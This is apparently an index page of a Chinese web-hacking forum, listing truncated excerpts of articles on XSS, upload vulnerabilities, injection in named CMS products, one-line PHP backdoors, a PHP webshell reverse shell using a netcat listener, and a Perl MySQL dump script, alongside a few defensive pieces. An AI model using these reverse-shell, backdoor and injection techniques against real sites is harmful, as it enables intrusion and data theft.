小编 脚本攻防 XSS漏洞报告 一、什么是XSS XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。XSS属于被动式...
小编 脚本攻防 利用Request对象的包解析漏洞绕过防注入程序 今天无聊来看看他们的站,打开网站 asp 的企业站 ,点了几个链接看了下,看不出来什么程序 于是扫扫目录 扫出来个 upload_photo.asp 这个文件一般使用的是无惧无组件上传 ,存在双文件上传的漏洞 ,尝试 cookies 欺骗绕过登录检测 ...
小编 脚本攻防 dedecms官方模板包含一句话后门木马 现在的黑客多胆大包天啊,在天朝居然敢干这种明目张胆的事情。 应该是前几天出的那个dedecms的0day.官方的网站被日,然后被在风格模板里面值入 了一句话木马。XXOO。这年头啥多靠不住。”官方”也一样!你懂得的? 另外一个目...
小编 脚本攻防 PHP Webshell 下的端口反弹方法 使用方法:需要将以下代码保存为一个单独的php文件。上传到服务器之后,本地NC监听一个端口,在代码里设置好反弹IP和端口,然后直接访问上传的php文件,就会给 NC 弹回来一个shell。 测试实例:先在本地执行 nc -vv -l -p port,然...
小编 脚本攻防 网站防范 \”上传漏洞\”入侵的方法 “上传漏洞”入侵是目前对网站最广泛的入侵方法。90%的具有上传页面的网站,都存在上传漏洞。本文将介绍常见的上传漏洞及其防范技巧。 一、能直接上传asp文件的漏洞 如果网站有上传页面,就要警惕直接上传asp文件漏洞。例如去年流行的...
小编 脚本攻防 php后台插一句话后门的思路分享 首先介绍下php的各种标签: 1): <?php ?> demo: <?php echo "test";?> 这个标签现在程序大多都是使用的这种标签!大家都不陌生了,这里就不多介绍了! 2): <? e...
小编 脚本攻防 万博企业网站管理系统注入漏洞(MemberLogin.asp) 这两天拿站的时候,好几回都遇到个叫万博的企业管理系统,今天有时间就下载过来看了看,找到了个注入漏洞,郁闷的是,得手工,没法用工具,累人的事。因为已经找到了一个,我就没兴趣接着往下看了。 这个注入漏洞发生在html/MemberLogin.asp文件里,...
小编 脚本攻防 脚本入侵-上传漏洞总结篇(臭小子) 1:抓包上传 我们可以用WSockExpert(抓包工具) hkcpost抓包提交软件或等等抓包工具 说下hkcpost有时候电脑打不开WSockExpert(抓包工具) 我们就用这工具 很好用 说到抓包上传 比如一个上传地址http://site/u...
小编 脚本攻防 PJBlog3 V3.2.8.352文件Action.asp修改任意用户密码 发布日期:2011-06.19 发布作者:佚名 影响版本:PJBlog3 V3.2.8.352 漏洞类型:设计错误 漏洞描述:PJBlog一套开源免费的中文个人博客系统程序,采用asp+Access的技术,具有相当高的运作效能以及更新率,也支持目前Bl...
小编 脚本攻防 防止网站被JS,iframe挂马的防范方法 这种方法使用的关键代码如下: window.open("http://www.hacker.com/木马.html","","toolbar=no,location=no,directories=no,...
小编 脚本攻防 mysql注入导库脚本代码 复制代码 代码如下: #!/usr/bin/perl -w #www.sh3llc0de.com #转载须注明 #语法 自己改改 use strict; use LWP::Simple; use utf8; $|++; my $count = 1; f...